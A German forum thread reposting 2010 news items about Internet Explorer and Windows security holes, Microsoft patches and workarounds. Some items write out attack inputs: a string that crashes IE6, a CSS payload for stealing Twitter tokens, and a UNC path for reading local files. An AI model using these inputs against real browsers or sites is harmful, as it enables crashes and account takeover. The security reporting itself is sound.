Parallel zur Ankündigung des Patches für den IE hat Microsoft die gestern gemeldete Privilege-Escalation-Lücke in Windows bestätigt. Man untersuche die Lücke weiter und entscheide dann, ob, wie und in welchen Zeitrahmen man sie schließe. Als Workaround empiehlt Microsoft, die Unterstützung für 16-Bit-Anwendungen über die Gruppenrichtlinien zu deaktivieren. Der Tipp funktioniert allerdings nur bei Firmenkunden, da die Windows-Versionen der meisten Heimanwender keinen Editor für Gruppenrichtlininen mitbringen. Alternativ kann man auch in der Registry den Schlüssel \HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat erzeugen und dort als D-Word-Wert VDMDisallowed = 1 anlegen. Unter XP lief der Exploit in Tests von heise Security anschließend nicht mehr, Automatisch funktioniert das Anlegen des Schlüssels, wenn man sich die Datei vdmdisallow.reg mit folgendem Inhalt anlegt:
und die Datei anschließend doppelklickt (Adminrechte vorausgesetzt)
Quelle : www.heise.de
Titel: Der Notfall-Patch für den Internet Explorer
Beitrag von: SiLæncer am 21 Januar, 2010, 20:14
Bei dem Notfall-Update für den Internet Explorer handelt es sich um einen Sammel-Patch, der insgesamt gleich acht verschiedene Sicherheitslücken entschärfen soll. Die sicherlich wichtigste ist der Fehler in der Speicherverwaltung, der für gezielte Einbrüche bei Firmen wie Google ausgenutzt wurde und zu dem passender Exploit-Code auch bereits im Internet kursiert.
Darüber hinaus behebt Microsoft mindestens vier weitere Probleme, für die demnächst wohl Schadcode auftauchen wird. Zwei weitere Fehler im Speichermanagement hat angeblich bereits der Dezember-Patch für den IE so entschärft, dass sie sich nicht mehr gezielt ausnutzen lassen. Und schließlich hat Microsoft anscheinend auch das bereits bekannte XSS-Problem im Internet Explorer 8 doch noch entschärft.
Die Sicherheitsprobleme betreffen alle Versionen des Internet Explorer auf allen Windows-Versionen, einschließlich Internet Explorer 8 auf Windows 7. Das höchste Risiko trifft zwar die Anwender älterer Versionen, bei denen Schutzmechanismen wie Data Execution Prevention (DEP) und Adress Space Layout Randomisation (ASLR) noch nicht vorhanden oder aktiv sind. Doch auch die lassen sich umgehen, so dass jeder Windows-Nutzer diesen Sammel-Patch einspielen sollte. Im Übrigen können auch andere Windows-Anwendungen für die Probleme anfällig sein, wenn sie wie Outlook Komponenten des Internet Explorer verwenden. Auch diese Applikationen werden durch den Patch geschützt.
Siehe dazu auch:
* Sammel-Update für den Internet Explorer (http://www.microsoft.com/germany/technet/sicherheit/bulletins/ms10-002.mspx), Sicherheitsnotiz MS10-002 von Microsoft
Quelle : www.heise.de
Titel: IE-Schwachstelle bereits im August bekannt?
Beitrag von: SiLæncer am 23 Januar, 2010, 06:54
Waren diese Aufregung und der den angegriffenen Unternehmen entstandene Schaden womöglich unnötig? Möglich wäre es, denn offenbar wurde Microsoft der Fehler nicht erst kürzlich bekannt. Angeblich soll der Fehler bereits im August 2009 von der israelischen Sicherheitsfirma BugSeq entdeckt worden sein. Jerry Bryant, Mitarbeiter der Microsoft-Sicherheitsabteilung, bestätigt diese Version in einem Blogeintrag. Er schreibt: "Im Zuge [unserer] Ermittlungen haben wir auch festgestellt, dass die Schwachstelle die selbe war wie eine Schwachstelle, die uns im September in verantwortungsvoller Weise berichtet und bestätigt wurde."
Meron Sellem, Mitarbeiter von BugSeq, kritisiert Microsoft. Die Firma habe zu lange gebraucht, um einen Patch herauszubringen, erklärt er. "Ich finde, ja, es hat zu lange gedauert. Aber Microsoft ist eine große Organisation und wir wissen nicht, wie lange sie brauchen. Wir haben sie gefragt, warum es so lange dauert, und sie sagten es sei wegen den Tests, die sie durchführen mussten," berichtet Sellem.
Sicherheitsexperte Andrew Storms zeigt sich wenig überrascht über diese späte Reaktion. Er erklärt: "Wir wissen, dass diese Patches einen Monat oder so in der QA [Quality Assurance] bei Microsoft verbringen. Das heißt, wenn Microsoft im September davon erfuhr, wurde es vielleicht nicht vor Oktober in den Patch-Zyklus aufgenommen, und der Code nicht vor November geschrieben. Eine Veröffentlichung im Februar ist angesichts dessen nicht verrückt." Es sei leicht, im Nachhinein Kritik zu üben, aber es habe sich nicht voraussehen lassen, dass ausgerechnet diese Schwachstelle so massiv ausgenutzt werden würde.
Sellem allerdings berichtet, die betreffende Schwachstelle sei sehr leicht zu finden gewesen. Dementsprechend sei es kaum überraschend, dass auch Andere auf die Lücke gestoßen seien.
Wie auch immer: Mittlerweile ist die Schwachstelle durch den neuesten Patch behoben. Im Zuge des selben Updates wurden noch sieben weitere Schwachstellen, darunter einige ernsthafte, behoben. Es handelt sich um dieselben Updates, die eigentlich für die Veröffentlichung am Februar-Patchday vorgesehen waren.
Quelle: www.gulli.com
Titel: Einzeiler bringt Internet Explorer zum Absturz
Beitrag von: SiLæncer am 27 Januar, 2010, 17:00
Mit einem einfachen Script lässt sich der Internet Explorer (Version 6 und 7) zum Absturz bringen. Die aktuelle Version des Internet Explorer 8 ist nicht betroffen. Ob und wie Microsoft reagieren wird ist bislang unklar.
Kurz und bündig wurde der Angriff gegen den Microsoft Internet Explorer in Version 6 und 7 auf der Mailingliste „Bugtraq“ vorgestellt. Mit folgendem Einzeller lassen sich die beiden betroffenen Versionen des Microsoft Webbrowser ganz einfach zum Absturz bringen:
Wir haben das Script mit den aktuellen Versionen des Internet Explorer Version 6 und 7 unter Windows XP getestet – es funktioniert. Der Browser verabschiedet sich ins digitale Nirvana. Internet Explorer 8 ist gegen diese Denial-of-Service Attacke immun – der Browser lief unbeeinflusst weiter.
In letzter Zeit geriet der Internet Explorer öfter durch verschiedene Sicherleitslücken in den Fokus der Öffentlichkeit. So zwang der vor kurzem bekannt gewordene Aurora-Exploit Microsoft dazu außerhalb seines normalen Patch-Zyklus einen Patch zu veröffentlichen, nachdem erste großflächige Attacken mit Hilfe der Sicherheitslücke gestartet wurden. Im Rückenwind der aktuellen Probleme des Internet Explorers erschienen auch neue Versionen der größten Browser-Konkurrenten Firefox und Chrome.
Quelle : www.tecchannel.de
Titel: Internet Explorer bleibt Sorgenkind
Beitrag von: SiLæncer am 28 Januar, 2010, 11:02
Microsoft kommt mit dem Internet Explorer nicht zur Ruhe: Auf der kommenden Sicherheitskonferenz Black Hat will der Sicherheitsspezialist Jorge Luis Alvarez Medina von Core Security Schwachstellen vorführen, durch die eine präparierte Webseite beliebige Dateien auf einem Windows-PC auslesen kann.
Das Problem soll eigentlich nicht neu sein und darauf beruhen, dass die Einstellungen der Sicherheitszonen im Internet Explorer nicht immer greifen, wenn eine Pfadangabe im Browser im UNC-Format (Uniform Naming Convention, UNC) angeben ist, beispielsweise \\127.0.0.1\pfad\dateiname. Damit kann ein JavaScript aus der Internet Zone unter bestimmten Umständen auf eine lokal abgelegte Datei zugreifen, obwohl das Zonemodell dies verbietet. Details dazu will Medina erst am 3. Februar auf der Black Hat veröffentlichen.
Core Security hat zwei solcher sogenannten Cross-Domain-Schwachstellen bereits 2008 und 2009 an Microsoft gemeldet (hier und hier ), die dafür auch jeweils Updates bereitgestellt haben. Bislang habe Microsoft immer nur an einer Stelle geflickt, ohne jedoch das eigentliche Problem zu behandeln. Es gebe aber weitere Wege, das Zonenmodell auszuhebeln. Laut Medina seien diese Wege sehr schwer zu versperren, da es sich um grundlegende Funktionen des Browsers handele, damit der Browser mit anderen Anwendungen nahtlos zusammenarbeiten kann.
Betroffen sind durch die Bank alle Versionen des Internet Explorer von Version 6 bis 8 auf allen verfügbaren Windows-Versionen – inklusive Windows 7. Microsoft soll über die Probleme informiert sein und mit Core Security bereits an einer Lösung arbeiten. Meldungen über erfolgreiche Angriffe durch diese Lücke gebe es nicht. Vorschläge zum Schutz machen bislang weder Medina noch Microsoft.
Erst vergangene Woche musste Microsoft mit einem Notfall-Patch eine kritische Lücke in seinem Browser schließen, durch die vermutlich chinesische Hacker erfolgreich bei Google, Adobe und anderen US-Unternehmen eindrangen.
Anwender sollten den Einsatz eines alternativen Browsers in Erwägung ziehen. Zur Wahl stehen Firefox, Chrome und Opera. Diese weisen zwar auch immer wieder kritische Sicherheitslücken auf, insbesondere in Firefox beseitigen die Entwickler häufig kritische Fehler, allerdings gab es dafür bislang so gut wie nie Zero-Day-Exploits. Zudem konzentrieren sich Kriminelle weiterhin auf den Internet Explorer als Angriffsziel. Mit dem zunehmenden Marktanteil des Firefox könnte allerdings auch dieser bald verstärkt unter Beschuss stehen.
Quelle : www.heise.de
Titel: Microsoft bestätigt neue Lücke im Internet Explorer
Beitrag von: SiLæncer am 04 Februar, 2010, 11:44
Microsoft hat die am Dienstag offiziell auf der Sicherheitskonferenz Black Hat DC vorgeführte Sicherheitslücke bestätigt und eine eigene Warnung veröffentlicht. Die Lücke ermöglicht es einer präparierten Webseite, auf beliebige Dateien auf dem PC zuzugreifen und deren Inhalte auszulesen. Dazu muss der Angreifer zwar den konkreten Pfad und den Dateinamen wissen, bei den üblichen Standardinstallationspfaden sind die aber meist bekannt.
Grundsätzlich sind alle Versionen des Internet Explorer von 5.01 bis 8 auf allen noch unterstützten Windows-Plattformen betroffen. Die Lücke lässt sich im Internet Explorer 7 und 8 unter Windows 7, Vista und Server 2003/2008 nicht ausnutzen, wenn im Webbrowser der geschützte Modus (Protected Mode) aktiviert ist – standardmäßig ist er das.
Microsoft untersucht nach eigenen Angaben, wie es das Problem lösen kann. Allerdings ist es wohl nicht so einfach zu lösen, wie der Entdecker der Lücke Jorge Luis Alvarez Medina von Core Security Technologies bereits mehrfach unterstrich. Kern des Problems ist, dass die Einstellungen der Sicherheitszonen im Internet Explorer nicht immer greifen, wenn eine Pfadangabe im Browser im UNC-Format (Uniform Naming Convention, UNC) angegeben ist, beispielsweise file://127.0.0.1/C$/.../index.dat. Damit kann ein JavaScript aus der Internet Zone unter bestimmten Umständen auf eine lokal abgelegte Datei zugreifen (und sie rendern), obwohl das Zonenmodell dies verbietet.
Core Security hat zwei solcher sogenannten Cross-Domain-Schwachstellen bereits 2008 und 2009 an Microsoft gemeldet, die dafür auch jeweils Updates bereitgestellt haben. Bislang hat Microsoft immer nur an einer Stelle geflickt, ohne jedoch das eigentliche Problem zu behandeln. In der Folge hat nun Medina einen weiteren Weg gefunden, lokale Dateien auszulesen. Dabei macht er sich einen Fehler bei der Ermittlung des MIME-Types von lokalen Dateien sowie eine Schwäche beim Verarbeiten von OBJECT-Tags zunutze, um die von Microsoft aufgebauten Hürden zu überwinden.
Bis zur Verfügbarkeit einer echten Lösung bietet Microsoft ein Fix-it-Tool zum Download (http://support.microsoft.com/kb/980088) an, mit dem der Internet Explorer das file-Protokoll nicht mehr unterstützt. In der Folge könnten aber Probleme mit anderen Anwendungen auftreten.
Quelle : www.heise.de
Titel: URL-Fehler bringt Internet Explorer 6 zum Absturz
Beitrag von: SiLæncer am 05 Februar, 2010, 13:03
Der Sicherheitsspezialist Alex Holden hat einen Weg gefunden, mit dem sich der Internet Explorer 6 durch Eingabe einer elfstelligen Zeichenfolge auf einfachste Art und Weise zum Absturz bringen lässt.
Holdens Angaben zufolge ist der Fehler auf einen Pufferüberlauf bzw. Pointer-Überlauf zurück zu führen, der im Internet Explorer 6 besteht. Die jüngeren Versionen des Microsoft-Browsers sind von dem Problem nicht betroffen, berichtet 'KrebsOnSecurity'.
Microsoft wurde von Holden angeblich schon 2004 über den Fehler informiert. Der Softwarekonzern bestätigte das Problem zwar, sah aber keinen Handlungsbedarf, weil keine ernst zu nehmenden Sicherheitsprobleme zu erwarten sind. Den Fehler wollte man ursprünglich mit einem weiteren Service Pack beseitigen, was jedoch nie geschah.
Um den Fehler auszunutzen, muss man lediglich "ms-its:%F0:" in die Adresszeile des Internet Explorer 6 eingeben und Enter drücken. Der Browser quittiert die Eingabe mit einem Absturz. Zwar stellt der Bug kein Sicherheitsrisiko dar, er könnte aber dennoch zu einem nervtötenden Problem werden.
Krebs mutmaßt, dass ein Wurm in der Lage wäre, die Einstellung für die Startseite des Internet Explorer 6 so zu verändern, dass bei jedem Start die oben genannte Zeichenfolge aufgerufen wird. Der Nutzer wäre dadurch nicht mehr in der Lage, den Browser zu öffnen. Auch der Versand entsprechender Links in E-Mails oder Instant-Messenger-Nachrichten sei denkbar, heißt es.
Quelle : http://winfuture.de
Titel: Re: URL-Fehler bringt Internet Explorer 6 zum Absturz
Beitrag von: Jürgen am 06 Februar, 2010, 01:05
Die Internet-Optionen lassen sich auch über die Systemsteuerung erreichen, ohne ein Browser-Fenster zu öffnen. Und darüber ist es kein Problem, die Startseite zu verändern. Ich empfehle grundsätzlich "about:blank"...
Titel: Microsoft warnt vor Sicherheitslücke in Windows-Hilfe
Beitrag von: SiLæncer am 01 März, 2010, 09:45
Sie betrifft Nutzer des Internet Explorer unter Windows XP. Ein Angreifer kann beliebigen Schadcode einschleusen und ausführen. Dazu muss sein Opfer eine manipulierte Website besuchen und über die F1-Taste die Windows-Hilfe aufrufen.
Microsoft hat vor einer Sicherheitslücke in der Windows-Hilfe gewarnt, die mittels VBScript über den Internet Explorer unter Windows XP ausgenutzt werden kann. Nutzer von Windows 7, Vista, Server 2008 und Server 2008 R2 sind nicht betroffen. Die Schwachstelle ermöglicht das Einschleusen und Ausführen beliebigen Schadcodes.
Ein Angreifer muss dafür sein Opfer auf eine manipulierte Website locken und beispielsweise mithilfe eines Pop-up-Fensters dazu bringen, mit der F1-Taste die Windows-Hilfe aufzurufen. Microsoft-Sprecher Jerry Bryant erklärte, dass bisher kein Exploit für die Codeanfälligkeit im Umlauf sei.
Die Schwachstelle wurde am Freitag, zusammen mit einem Proof-of-Concept, von iSEC Security Research veröffentlicht. Einem Advisory der Sicherheitsforscher zufolge ist der Fehler seit Februar 2007 bekannt. Microsoft kritisiert in einem Blogeintrag, dass iSEC die Lücke nicht vorab vertraulich gemeldet hat.
"Nach Abschluss unserer Untersuchungen werden wir alle nötigen Schritte einleiten, um unsere Kunden zu schützen", schreibt Bryant im Blog des Microsoft Security Response Center. Er nennt aber keinen Zeitplan für die Veröffentlichung eines Updates. Der nächste reguläre Patchday ist der 9. März.
Quelle : www.zdnet.de
Titel: Microsoft warnt vor neuer Lücke im Internet Explorer
Beitrag von: SiLæncer am 10 März, 2010, 09:17
Pünktlich zum gestrigen Patch-Day hat Microsoft vor einer neuen Sicherheitslücke im Internet Explorer gewarnt. Davon sind laut derzeitigem Stand nur die Versionen 6 und 7 betroffen. Nutzer des Internet Explorer 8 sind in diesem Fall sicher.
Das Problem ist laut Microsoft eine fehlerhafte Pointer-Referenz. Der Pointer lässt sich nutzen, obwohl das Objekt, auf das verwiesen wird, bereits gelöscht ist. Mit einer speziell darauf abgestimmten Attacke ist es möglich, dass unbemerkt Schadcode auf den betroffenen Rechnern ausgeführt wird.
Die Sicherheitslücke wird laut dem Security Advisory bereits aktiv ausgenutzt. Sobald Microsoft die Untersuchungen abgeschlossen hat, wird ein Patch entwickelt. Je nach Dringlichkeit wird dieser am nächsten Patch-Day oder außerhalb des monatlichen Zyklus veröffentlicht.
Quelle : http://winfuture.de
Titel: Exploit für neue IE-Lücke
Beitrag von: SiLæncer am 11 März, 2010, 11:32
Für die neue Sicherheitslücke im Internet Explorer 6 und 7 ist jetzt ein öffentlich verfügbarer Exploit aufgetaucht – als Modul (http://www.metasploit.com/modules/exploit/windows/browser/ie_iepeers_pointer) für das Exploit-Framework Metasploit. Da nun vermutlich in Kürze weitere Webseiten die Lücke aktiv ausnutzen werden, dürfte Microsoft in Zugzwang geraten, schnell einen Patch herauszugeben. Bislang hatten die Redmonder nur wenige gezielte Angriffe beobachtet, bei der eine Lücke in der Komponente iepeers.dll zum Infizieren eines Systems ausgenutzt wurde. Daher wollte der Software-Hersteller die Lage weiter beobachten und empfahl Anwendern, auf den Internet Explorer 8 zu wechseln, der nicht verwundbar ist. Der Metasploit-Erfinder H.D. Moore hatte kürzlich auf de RSA-Konferenz Software-Herstellern vorgeworfen, erst dann schnell zu reagieren, wenn ein Exploit kursiert – man darf gespannt sein, ob sich diese Prognose abermals bestätigt.
Das Metasploit-Modul beruht auf der Analyse des Original-Exploits. Er nutzt eine fehlerhafter Pointer-Dereferenzierung, um eingeschleusten Code zu starten. Darauf gestoßen war der israelische Entwickler Moshe Ben Abu durch Hinweise auf die Domain www.topix21century.com im Blog von McAfee, aus der der ursprüngliche Exploit stammt.
Das Metasploit-Modul funktioniert für Microsoft Internet Explorer 7 unter Windows Vista SP2, Internet Explorer 7 unter Windows XP SP3 sowie Internet Explorer 6 unter Windows XP SP3, allerdings nur, wenn die Datenausführungsverhinderung (DEP) noch nicht aktiviert ist. Der Exploit arbeitet allerdings noch nicht ganz zuverlässig.
Quelle : www.heise.de
Titel: Mausklick-Workarounds für IE-Sicherheitslücke
Beitrag von: SiLæncer am 15 März, 2010, 16:01
Microsoft hat zwei Fix-it-Tools für die kritische Sicherheitslücke im Internet Explorer veröffentlicht. Mit wenigen Mausklicks können Anwender nun dafür sorgen, dass der derzeit im Netz zirkulierende Exploit auf ihrem System nicht mehr funktioniert und so die Zeit bis zum Erscheinen eines Patches überbrücken.
Mit dem ersten Fix-it für IE6 und IE7 unter Windows XP und Server 2003 lässt sich die Peer-Klasse in der betroffenen Bibliothek iepeers.dll deaktivieren. Damit ist die Lücke zwar endgültig dicht, doch das Vorgehen kann unerwünschte Nebenwirkungen im Windows-Netzwerk haben. Unter Vista und Server 2008 ist das Fix-it-Tool wirkungslos; wer den Workaround dennoch aktivieren möchte, muss gemäß der Anleitung im Microsoft-Advisory vorgehen.
Das zweite Fix-it-Tool aktiviert die Datenausführungsverhinderung DEP in IE6 und IE7 auf Systemen, die dies unterstützen. Das ist seit Windows XP SP2 und Windows Server 2003 SP1 der Fall. Voraussetzung ist aber auch, dass die CPU das Feature unterstützt. Bei AMD nennt es sich NX (No Execute) und Intel nennt es XD (Execute Disable). In den 64-Bit-Versionen von Vista und Windows 7 ist DEP ohnehin global aktiviert; IE8 aktiviert DEP automatisch auf allen Systemen, die es unterstützen.
DEP ist grundsätzlich empfehlenswert, da es vielen gängigen Exploit-Techniken einen Strich durch die Rechnung macht und lediglich in wenigen Fällen Probleme mit Add-ons verursacht. Allerdings bietet DEP keinen kompletten Schutz. Dass es sich umgehen lässt, haben Sicherheitsexperten bereits bei älteren IE-Exploits gezeigt. Es ist daher wahrscheinlich, dass bald auch ein für DEP angepasster Exploit die Runde machen wird.
Sollte ein Fix-it-Tool Probleme verursachen, lässt es sich per Mausklick auch wieder deaktivieren.
Siehe dazu auch:
* Microsoft Security Advisory: Vulnerability in Internet Explorer could allow remote code execution (http://support.microsoft.com/kb/981374), Fix-Its von Microsoft
Quelle : www.heise.de
Titel: Angriffe auf kritische IE-Lücke nehmen stark zu
Beitrag von: SiLæncer am 26 März, 2010, 17:57
Den Beobachtungen des Sicherheitsdienstleisters AVG zufolge nehmen die Angriffe auf eine bisher ungepatchte Schwachstelle im Internet Explorer 6 und Internet Explorer 7 momentan sehr stark zu. Es ist die Rede von 30.000 Angriffen pro Tag.
Seit Ende der vergangenen Woche beobachteten die Experten aus dem Hause AVG einen stetigen und steilen Anstieg der Attacken auf diese Zero-Day-Schwachstelle im Internet Explorer. Nichtsdestotrotz spricht der Forschungsleiter von AVG, Roger Thompson, gegenüber 'Computerworld' nicht von einem Großangriff, sondern von aggressiven Attacken.
In erster Linie versuchen die Angreifer dabei, manipulierte Antiviren-Software, auch unter der Bezeichnung Scareware bekannt, auf die Systeme der Opfer einzuschleusen. Abgesehen davon wird probiert, den Schädling namens Sinowal auf diese Weise verstärkt in Umlauf zu bringen.
Wie bereits angesprochen liegt für diese Sicherheitslücke noch kein Patch, sondern lediglich eine Übergangslösung in Form von einem "Fix It"-Tool vor. Bei der Anwendung dieses Tools wird die verwundbare Komponente in der Programmbibliothek "iepeers.dll" deaktiviert.
Microsoft empfiehlt allen Nutzern von Windows XP und Windows Server 2003 dieses Tool zu nutzen, bis ein zugehöriger Patch offiziell erscheint.
Quelle : http://winfuture.de
Zitat
In erster Linie versuchen die Angreifer dabei, manipulierte Antiviren-Software, auch unter der Bezeichnung Scareware bekannt, auf die Systeme der Opfer einzuschleusen.
Da war doch kürzlich was ;D ;)
Titel: Microsoft patcht Internet Explorer außer der Reihe
Beitrag von: SiLæncer am 30 März, 2010, 10:09
In einer Vorabbenachrichtigung erklärt Microsofts Sicherheitsteam, dass man am 30. März einen Patch für den Internet Explorer veröffentlichen wolle. Der wird dann wahrscheinlich wie üblich nach deutscher Zeit heute Abend gegen 20 Uhr erscheinen.
Damit erscheint das Update außerhalb des gewohnten, monatlichen Patch-Rhythmus. Ursache dafür ist die Tatsache, dass die Sicherheitslücke in der Bibliothek iepeers.dll im Internet bereits aktiv ausgenutzt wird; am letzten Freitag ist sogar noch eine verbesserte Version des Exploits veröffentlicht worden. Die Lücke war Anfang März bekannt geworden, wurde beim darauf folgenden Patchday jedoch noch nicht berücksichtigt.
Die Angriffe betreffen zwar nur Internet Explorer 6 und 7; laut Sicherheitsnotiz schließt das Update jedoch auch eine kritische Lücke im Internet Explorer 8 auf Windows 7. Ob das bedeutet, dass die Redmonder auch gleich das Sicherheitsloch schließen, über das der Browser letzte Woche im Rahmen des Pwn2wn-Wettbewerbs vorgeführt wurde, lässt die Vorabmeldung jedoch leider offen.
Quelle : www.heise.de
Titel: Zehn auf einen Streich -- Microsoft patcht Internet Explorer
Beitrag von: SiLæncer am 30 März, 2010, 23:21
Mit einem außerplanmäßigem Update schließt Microsoft die seit rund drei Wochen bekannte kritische Lück im Internet Explorer (iepeers.dll) – und gleich noch neun weitere, bislang unbekannte. Allerdings ist nicht jede der Lücken in allen unterstützten Versionen zu finden. Zudem variiert das Risiko eines erfolgreichen Angriffs je nach Version des Browsers und der Windows-Version, auf der er läuft. Die Gründe sind in der verbesserten Sicherheitsfunktionen in neueren Browser-Version (etwa geschützter Modus) und den Windows-Versionen (DEP, ASLR) zu finden.
Offen bleibt weiterhin die seit vier Wochen bekannte "F1-Lücke". Sie beruht auf der Möglichkeit der VBScript-Funktion MsgBox, Hilfe-Dateien (.hlp) von Netzwerkfreigaben nachzuladen und mit darin enthaltenen Makros beliebige Befehle auszuführen. Allerdings ist ein wenig Nutzerinteraktion notwendig: Der Anwender muss zur Bestätigung die F1-Taste drücken.
Für die im Rahmen des Pwn2own-Wettbewerbs gefundene Lücke im Internet Explorer 8 war die Zeit für einen Patch anscheinend zu kurz. Peter Vreugdenhil gelang es während des Wettbewerbs, den Internet Explorer 8 auf Windows 7 trotz ASLR und DEP zu knacken. Bislang beschränken sich die Informationen zu dieser Sicherheitslücke allerdings auf einen wenig konkreten Blog-Beitrag des Entdeckers (http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf).
Quelle : www.heise.de
Titel: IE8: Lücke macht XSS-Filter zu Hilfsmittel für Angreifer
Beitrag von: SiLæncer am 20 April, 2010, 19:53
Microsoft will innerhalb der nächsten zwei Monate ein Sicherheitsupdate für den Internet Explorer 8 veröffentlichen, das Probleme mit dem Cross-Site-Scripting-Filter (XSS) beseitigen soll.
Hintergrund ist eine im Rahmen der Sicherheitskonferenz Black Hat Europe veröffentlichte Warnung, wonach der integrierte XSS-Filter des Microsoft-Browsers von Angreifern zur Durchführung von XSS-Attacken missbraucht werden könnte. Normalweise soll der Filter genau diese Art von Angriffen verhindern.
Nach Angaben von Sicherheitsexperten kann die Schwachstelle so ausgenutzt werden, dass man Websites angreifen kann, die normalerweise gegen XSS-Attacken immun sind. Dies wurde inzwischen anhand von Demos belegt, die zeigten, dass auch wichtige Seiten wie Microsofts Suchmaschine Bing, Google.com, Wikipedia.org und Twitter durch die Schwachstelle verwundbar sind.
Microsoft hatte in diesem Jahr bereits mehrfache Sicherheitsupdates veröffentlicht, die ähnliche Schwachstellen beseitigen sollen. Für den Juni plant man nun die Bereitstellung eines weiteren Updates, das die letzten verbleibenden Angriffsvektoren schließt.
Weitere Informationen:Microsoft Security Response Center (http://blogs.technet.com/msrc/archive/2010/04/19/guidance-on-internet-explorer-xss-filter.aspx)
Quelle : http://winfuture.de
Titel: XSS-Lücke im Internet Explorer wird im Juni behoben
Beitrag von: SiLæncer am 21 April, 2010, 09:23
Microsoft will eine Sicherheitslücke in einem Filter des Internet Explorer 8 schließen, der für Angriffe genutzt werden kann, vor denen er eigentlich schützen sollte. Angriffe auf Basis des Cross-Site-Scripting-Filters wurden auf der Hacker-Konferenz Black Hat Europe demonstriert.
Ein Patch für dieses Problem will Microsoft im Juni zur Verfügung stellen. Ein Microsoft-Sprecher erklärte, dass dies ein regulärer Termin sei, wenn man die ausführlichen Tests berücksichtigt, die vor der Veröffentlichung eines Updates durchgeführt werden müssen. Auf der Back Hat Europe wurde gezeigt, wie man schadhaften Code auf bekannten Websites wie Google, Bing und Twitter ausführen kann.
Microsoft nimmt damit zum dritten Mal Anlauf, um die XSS-Schwachstelle zu beseitigen. Bereits im Januar hatte man sich dieses Problem mit dem Security Bulletin MS10-002 vorgenommen, erklärte der Microsoft-Mitarbeiter David Ross im offiziellen Blog des Security Response Center. Ein weiteres Update wurde mit dem Security Bulletin MS10-018 im März ausgeliefert.
Quelle : http://winfuture.de
Titel: Britische Regierung: Internet Explorer 6 ist sicher genug
Beitrag von: SiLæncer am 06 August, 2010, 12:37
Die britische Regierung hält am Einsatz des Internet Explorer 6 in den eigenen Behörden fest, er sei ausreichend sicher. Das geht aus einer offiziellen Antwort auf eine Online-Petition im Rahmen der von der neuen britischen Koalitionsregierung eingerichteten Seite für Verbesserungsvorschläge hervor. Der Webentwickler Dan Frydman hatte in einem Vorschlag angeregt, auf aktuellere Browser umzusatteln.
Nach Meinung der Regierung gebe es keine Beweise dafür, dass der Wechsel von einem vollständig gepatchten Internet Explorer 6 auf einen anderen Browser die Sicherheit erhöhe. Ein Wechsel etwa auf den Internet Explorer 8 wäre zu aufwändig und würde den Steuerzahler zu viel kosten. Weniger kostenintensiv sei der Einsatz von Firewalls und Virenscannern (und regelmäßigen Updates) um die Anwender zu schützen.
Microsoft selbst hält das Surfen mit dem Internet Explorer 6 für ein Risiko. Ende April dieses Jahres sagte Tom Köhler, Direktor Informationssicherheit bei Microsoft Deutschland anlässlich der Veröffentlichung des Security Intelligence Reports: "Wer heute noch den Internet Explorer 6 installiert hat, geht ein unnötiges Risiko ein und sollte dringend auf die kostenlose Version 8 upgraden, die ein deutlich höheres Schutzniveau bietet." Der offizielle Support für den Internet Explorer 6 geht im Rahmen von Windows XP SP3 aber offenbar noch bis 2014.
Quelle : www.heise.de
Titel: Internet Explorer: Datenklau durch zwei Jahre alte Lücke
Beitrag von: SiLæncer am 06 September, 2010, 15:54
Eine seit längerem bekannte Lücke (http://scarybeastsecurity.blogspot.com/2010/08/internet-explorer-considered-harmful.html) im Internet Explorer 8 ermöglicht es Angreifern, durch das Laden von Cascading Style Sheets (CSS) die Same Origin Policy auszutricksen und persönliche Daten ihrer Opfer zu stehlen. Chris Evans aus dem Google-Sicherheitsteam demonstriert dies anschaulich anhand eines Exploits (http://scary.beasts.org/misc/twitter.html), der es auf Twitter abgesehen hat, aber auf andere Seiten übertragbar ist: Wenn der Besucher der Demo-Seite bei dem Kurznachrichtendienst eingeloggt ist, extrahiert sie sein Authentifizierungs-Token aus einer Twitter-Seite und kann ungehindert in seinem Namen Nachrichten veröffentlichen.
Die Lücke ist bereits seit rund zwei Jahren bekannt und betraf damals alle wichtigen Browser – scheinbar hat von dem japanischsprachigen Bericht jedoch niemand Notiz genommmen. Erst ein Jahr später, nachdem Evans in seinen Blog auf die Gefahr aufmerksam gemacht hat, haben die Browserhersteller reagiert und ihre Produkte nach und nach abgesichert. Nachdem im Juli zuletzt Mozilla reagiert hat, ist nur noch der Internet Explorer in aktueller Version (und wohl auch älter) auf diese Weise verwundbar. Da der Angriff prinzipiell kein JavaScript erfordert, gibt es für Nutzer des Internet Explorers derzeit keinen wirksamen Schutz.
Prinzipiell können sich Angreifer durch die Lücke auf allen Seiten bedienen, die es Nutzern erlauben, eigenen Text unterzubringen. Bei dem Twitter-Beispiel genügt etwa ein Tweet mit dem Inhalt {}body{font-family:" – importiert der Angreifer auf seiner Seite den Twitter-Feed als CSS-Datei, kann er aufgrund des fehlertoleranten Parsing des IE Teile des Quelltexts als CSS-Eigenschaft "font-family" auslesen. Zusammen mit drei Studenten der Carnegie Mellon University hat Evans ein ausführliches Paper über die sogenannten Cross-Origin CSS-Angriffe veröffentlicht (http://websec.sv.cmu.edu/css/css.pdf).
Quelle : www.heise.de
Titel: Internet Explorer - Gefährliche Sicherheitslücken entdeckt
Beitrag von: SiLæncer am 21 September, 2010, 15:19
Im Internet Explorer sind mehrere gefährliche Sicherheitslöcher gefunden worden. Die Fehler können zur Ausführung beliebigen Programmcodes missbraucht werden. Ein Patch ist noch nicht verfügbar.
Die Sicherheitslücken im Internet Explorer stecken in einem ActiveX-Control, das für die Verwaltung von DRM-Inhalten zuständig ist. Wenn die Fehler nicht zur Codeausführung missbraucht werden, kann darüber der Internet Explorer zum Absturz gebracht werden. Gefunden wurden die Fehler von Asheesh Kumar Mani Tripathi, der sie samt Beispielcode in der Exploit-db.com (http://www.exploit-db.com/exploits/15061/) dokumentiert hat.
Welche Versionen vom Internet Explorer betroffen sind, ist nicht bekannt. Da Microsoft noch keine Informationen dazu veröffentlicht hat, kann auch von einem Patch noch keine Rede sein.
Quelle : www.golem.de
Titel: Sicherheitslücke in Internet Explorer 7 und 8
Beitrag von: SiLæncer am 22 Oktober, 2010, 15:21
Chris Evans hat eine Schwachstelle in Internet Explorer gemeldet.
